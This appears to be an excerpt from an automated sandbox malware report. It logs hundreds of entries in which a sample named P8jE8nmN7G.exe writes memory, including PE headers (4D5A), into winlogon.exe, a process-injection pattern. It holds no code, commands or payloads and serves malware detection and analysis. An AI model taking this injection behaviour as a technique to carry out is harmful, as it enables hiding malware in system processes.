Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D200000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D220000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D240000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D260000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D280000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D2A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D2C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D2E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D300000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D320000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D340000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D360000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D380000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D3A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D3C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D3E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D420000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D440000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D460000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D480000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D4A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D4C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D4E0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D500000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D520000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D540000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D560000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D580000 value starts with: 4D5A
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: D5A0000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 400000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 401000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 416000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 419000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: 41B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C940000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C941000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C956000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C959000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C95B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C960000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C961000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C976000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C979000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C97B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C980000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C981000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C996000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C999000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C99B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9A0000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9A1000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9B6000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9B9000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9BB000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9C0000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9C1000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9D6000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9D9000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9DB000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9E0000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9E1000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9F6000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9F9000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: C9FB000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA00000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA01000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA16000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA19000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA1B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA20000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA21000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA36000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA39000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA3B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA40000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA41000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA56000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA59000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA5B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA60000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA61000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA76000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA79000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA7B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA80000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA81000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA96000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA99000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CA9B000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAA0000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAA1000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAB6000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAB9000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CABB000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAC0000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAC1000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory written: C:\Windows\System32\winlogon.exe base: CAD6000
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CADB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
